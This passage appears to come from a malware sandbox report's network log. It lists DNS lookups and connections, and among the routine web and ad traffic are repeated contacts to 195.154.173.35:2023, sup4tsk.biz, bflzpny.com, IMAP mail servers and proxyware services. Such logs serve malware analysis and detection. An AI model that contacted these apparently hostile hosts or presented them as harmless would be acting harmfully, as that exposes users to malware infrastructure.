| GB | 142.250.187.214:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 176.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.246.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.142.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.142.245:443 | use.fontawesome.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | sup4tsk.biz | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dreamsnest.com | udp |
| US | 8.8.8.8:53 | dreamsnest.com | udp |
| GB | 157.240.221.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 172.67.211.143:443 | dreamsnest.com | udp |
| US | 172.67.211.143:443 | dreamsnest.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.38.181:443 | analytics.google.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | 143.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| NL | 142.251.39.100:443 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | adsdk.microsoft.com | udp |
| US | 8.8.8.8:53 | adsdk.microsoft.com | udp |
| US | 8.8.8.8:53 | cdn.adnxs.com | udp |
| US | 8.8.8.8:53 | cdn.adnxs.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 2.21.188.221:443 | cdn.adnxs.com | tcp |
| US | 13.107.246.64:443 | adsdk.microsoft.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | i1.ytimg.com | udp |
| US | 8.8.8.8:53 | i1.ytimg.com | udp |
| US | 8.8.8.8:53 | rr2---sn-aigl6ns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr2---sn-aigl6ns6.googlevideo.com | udp |
| US | 74.125.138.120:443 | csi.gstatic.com | tcp |
| GB | 172.217.16.238:443 | i1.ytimg.com | tcp |
| GB | 74.125.105.7:443 | rr2---sn-aigl6ns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 74.125.138.120:443 | csi.gstatic.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 74.125.138.120:443 | csi.gstatic.com | tcp |
| GB | 172.217.16.238:443 | i1.ytimg.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigl6nsd.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigl6nsd.googlevideo.com | udp |
| GB | 74.125.105.38:443 | rr1---sn-aigl6nsd.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr4---sn-aigl6ner.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4---sn-aigl6ner.googlevideo.com | udp |
| GB | 173.194.183.137:443 | rr4---sn-aigl6ner.googlevideo.com | tcp |
| US | 8.8.8.8:53 | ams3-ib.adnxs.com | udp |
| US | 8.8.8.8:53 | ams3-ib.adnxs.com | udp |
| NL | 185.89.210.212:443 | ams3-ib.adnxs.com | tcp |
| GB | 74.125.105.38:443 | rr1---sn-aigl6nsd.googlevideo.com | tcp |
| US | 74.125.138.120:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigl6nek.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigl6nek.googlevideo.com | udp |
| GB | 173.194.183.137:443 | rr4---sn-aigl6ner.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.105.125.74.in-addr.arpa | udp |
| GB | 74.125.105.38:443 | rr1---sn-aigl6nsd.googlevideo.com | tcp |
| GB | 173.194.183.102:443 | rr1---sn-aigl6nek.googlevideo.com | tcp |
| GB | 173.194.183.137:443 | rr4---sn-aigl6ner.googlevideo.com | tcp |
| GB | 74.125.105.38:443 | rr1---sn-aigl6nsd.googlevideo.com | tcp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| GB | 173.194.183.102:443 | rr1---sn-aigl6nek.googlevideo.com | tcp |
| GB | 173.194.183.137:443 | rr4---sn-aigl6ner.googlevideo.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 104.18.24.173:443 | a.tribalfusion.com | udp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| RU | 93.158.134.90:443 | an.yandex.ru | tcp |
| US | 70.42.32.31:443 | b1sync.zemanta.com | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | tcp |
| GB | 173.194.183.102:443 | rr1---sn-aigl6nek.googlevideo.com | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | udp |
| GB | 173.194.183.102:443 | rr1---sn-aigl6nek.googlevideo.com | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | img.youtube.com | udp |
| US | 8.8.8.8:53 | img.youtube.com | udp |
| RU | 77.88.55.88:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | 120.138.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.105.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.32.42.70.in-addr.arpa | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | dsp.adkernel.com | udp |
| US | 8.8.8.8:53 | dsp.adkernel.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 174.137.133.49:443 | dsp.adkernel.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 185.89.210.212:443 | ams3-ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | 88.55.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.133.137.174.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| GB | 142.250.187.206:443 | img.youtube.com | udp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 142.250.178.14:443 | img.youtube.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | imap.web.de | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | tohoi.com | udp |
| US | 8.8.8.8:53 | tohoi.com | udp |
| US | 104.21.13.132:443 | tohoi.com | udp |
| US | 104.21.13.132:443 | tohoi.com | tcp |
| US | 8.8.8.8:53 | 132.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.tohoi.com | udp |
| US | 104.21.13.132:443 | i.tohoi.com | udp |
| US | 104.21.13.132:443 | i.tohoi.com | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| BE | 104.68.85.7:443 | s.click.aliexpress.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | 7.85.68.104.in-addr.arpa | udp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | mbest.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| BE | 104.68.85.7:443 | assets.alicdn.com | tcp |
| US | 8.8.8.8:53 | is.alicdn.com | udp |
| US | 8.8.8.8:53 | is.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | acs.aliexpress.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| US | 8.8.8.8:53 | aeis.alicdn.com | udp |
| US | 8.8.8.8:53 | fourier.taobao.com | udp |
| US | 8.8.8.8:53 | fourier.taobao.com | udp |
| US | 8.8.8.8:53 | g.alicdn.com | udp |
| US | 8.8.8.8:53 | g.alicdn.com | udp |
| US | 8.8.8.8:53 | time-ae.akamaized.net | udp |
| US | 8.8.8.8:53 | time-ae.akamaized.net | udp |
| CN | 123.183.232.34:443 | fourier.taobao.com | tcp |
| BE | 23.14.90.81:443 | time-ae.akamaized.net | tcp |
| US | 163.181.154.229:443 | g.alicdn.com | tcp |
| US | 163.181.154.229:443 | g.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| BE | 23.55.96.49:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| CN | 123.183.232.34:443 | fourier.taobao.com | tcp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | ae.mmstat.com | udp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| US | 8.8.8.8:53 | fourier.aliexpress.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | login.aliexpress.com | udp |
| US | 8.8.8.8:53 | login.aliexpress.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| DE | 47.246.146.79:443 | acs.aliexpress.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| SG | 47.246.110.42:443 | ae.mmstat.com | tcp |
| US | 8.8.8.8:53 | de-wum.aliexpress.com | udp |
| US | 8.8.8.8:53 | de-wum.aliexpress.com | udp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 81.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.146.246.47.in-addr.arpa | udp |
| DE | 47.246.146.68:443 | fourier.aliexpress.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| US | 8.8.8.8:53 | us.ynuf.aliapp.org | udp |
| DE | 47.246.146.105:443 | de-wum.aliexpress.com | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| CN | 123.183.232.34:443 | fourier.taobao.com | tcp |
| US | 8.8.8.8:53 | 42.110.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.146.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.146.246.47.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| GB | 163.70.151.174:443 | www.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.21.69.4:443 | monitor.repocket.com | tcp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | digital.cpb.bank | udp |
| US | 107.162.169.111:443 | digital.cpb.bank | tcp |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| GB | 157.240.214.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 63.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| FR | 18.161.97.65:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 163.70.151.174:443 | www.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 87.240.190.75:443 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 157.240.214.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| GB | 142.250.178.14:443 | img.youtube.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:443 | dns.google | udp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | camo.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 192.178.49.163:443 | beacons.gvt2.com | tcp |
| US | 192.178.49.163:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 104.21.69.4:443 | monitor.repocket.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| FR | 18.161.97.5:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| FR | 18.161.97.5:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | monitor.repocket.com | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| FR | 18.161.97.5:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| FR | 18.161.97.5:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 8.8.8.8:53 | zamesoczxuswe.site | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.21.9.132:443 | zamesoczxuswe.site | udp |
| NL | 37.48.115.150:443 | fp-2.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 104.244.42.65:443 | twitter.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 151.101.194.167:443 | twitch.tv | tcp |
| GB | 216.58.212.206:443 | img.youtube.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| NL | 185.15.59.224:443 | en.wikipedia.org | tcp |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 151.101.62.167:443 | www.twitch.tv | tcp |
| GB | 54.38.210.150:443 | tcp | |
| NL | 185.15.59.224:443 | en.wikipedia.org | tcp |
| GB | 54.38.210.150:443 | tcp | |
| GB | 81.17.60.133:443 | fp-3.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | 132.9.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.115.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | oxy.st | udp |
| RU | 185.178.208.137:443 | oxy.st | tcp |
| RU | 185.178.208.137:443 | oxy.st | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| BE | 23.55.96.24:443 | contextual.media.net | tcp |
| AM | 5.101.37.37:443 | code-ya.jivosite.com | tcp |
| US | 8.8.8.8:53 | 137.208.178.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.37.101.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lg3.media.net | udp |
| GB | 2.21.188.27:443 | lg3.media.net | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 2.21.188.27:443 | lg3.media.net | tcp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| AM | 5.101.37.37:443 | code-ya.jivosite.com | tcp |
| US | 8.8.8.8:53 | node-ya-1.jivosite.com | udp |
| RU | 51.250.22.213:443 | node-ya-1.jivosite.com | tcp |
| US | 8.8.8.8:53 | 27.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | code.jivosite.com | udp |
| US | 8.8.8.8:53 | 213.22.250.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telemetry.jivosite.com | udp |
| GB | 198.244.165.101:443 | telemetry.jivosite.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | search-cdn.net | udp |
| US | 8.8.8.8:53 | maxask.com | udp |
